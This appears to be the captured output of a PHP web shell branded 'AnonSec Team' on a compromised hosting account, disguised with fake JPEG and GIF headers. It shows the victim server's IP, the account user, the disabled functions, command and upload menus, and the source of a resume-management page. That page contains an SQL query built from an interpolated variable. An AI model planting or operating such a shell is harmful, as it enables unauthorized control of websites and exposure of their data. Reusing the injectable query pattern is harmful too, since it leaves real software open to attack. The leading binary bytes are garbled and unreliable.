����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 18.117.105.184
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/.well-known/../../www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/.well-known/../../www/submitted_resume.php
<?php
   include "db.php";
   include "header.php";
   include "sidebar.php";
   ?>
<main id="main" class="main">
   <div class="pagetitle">
      <!--  <h1>New Resume</h1> -->
      <nav>
         <ol class="breadcrumb">
            <!--<li class="breadcrumb-item"><a href="index.php">Home</a></li>-->
            <!--<li class="breadcrumb-item active">Dashboard</li>-->
         </ol>
      </nav>
   </div>
   <!-- End Page Title -->
   <!-- Content Wrapper. Contains page content -->
   <div class="content-wrapper" style="height: 38rem;" >
      <!-- Content Header (Page header) -->
      <section class="content-header">
         <div class="container-fluid">
            <div class="card card-primary" >
               <div class="card-header">
                  <form method="POST">
                     <div class="row">
                        <div class="col-lg-5">
                           <select  name="img_id" id="imgid" class="form-control">
                              <option value=" ">Select Image Name</option>
                              <?php
                                 //echo $user_id;
                                 $stmt=("SELECT * FROM new_resume WHERE `user`='$log_id'");
                                  $result = $conn->query($stmt);
                                     while($row=$result->fetch_assoc())
                                     { ?>    
                              <option value="<?php echo $row['id'];?>"><?php echo $row['resume'];?></option>
                              <?php } ?>     
                           </select>
                        </div>
                        <div class="col-lg-2">
                        </div>
                     </div>
                  </form>
               </div>
               <div>
                  <p><b>&nbsp&nbsp
                    Please Select Image which data you want to Edit, Modify and Update then find which rows of column data Edit,<br>&nbsp&nbsp Modify and Update.    <!--<php echo $row2['img_name']; ?>--> 
                  </b></p>
               </div>
               <div class="card-body">
                  <table id="example" class="table table-striped table-bordered datatable overflow-x:auto" style="width:100%">
                     <thead>
                        <tr>
                           <!--<th>table sr No</th>-->
                           <th> </th>
                           <th> </th>
                           <th> </th>
                           <th> </th>
                           <th>Actions</th>
                          
                        </tr>
                     </thead>
                     <tbody id="cp" >
                          
                        <tr>
                          
                        </tr>
                        <?php //$sr=$sr+1;//} ?>
                     
                     </tbody>
                     
                  </table>
                  
               </div>
               <?php // } ?>
               <!-- /.card-body -->
            </div>
            <!-- /.card -->
         </div>
         <!-- /.col -->
   </div>
   <!-- /.row -->
   </div>
   <!-- /.container-fluid -->
   </section>
   <!-- /.content -->
   </div>
</main>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
<script>
   $(document).ready(function()
   {
   $("#imgid").change(function()
   {
   
   var img_id=$(this).val();
   var post_id = 'id='+ img_id;
   
   //here you can getvalue of your textbox  //make the ajax call
    console.log(post_id);
    
    //cnsole.log
   $.ajax
   ({
   type: "POST",
   url: "submitedfetch.php",
   data:post_id, //{option :post_ id, resname : resname},  //post_id,
   cache: false,
   success: function(cities)
   {
   
   $("#cp").html(cities);
   console.log(cp);
   } 
   });
   
   });
   });
</script>   

<script>
document.addEventListener('contextmenu', event=> event.preventDefault()); 
document.onkeydown = function(e) { 
if(event.keyCode == 123) { 
return false; 
} 
if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){ 
return false; 
} 
if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){ 
return false; 
}
if(e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)){ 
return false; 
} 

if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){ 
return false; 
} 
} 
</script>

<?php
   include "footer.php";
     ?>

AnonSec - 2021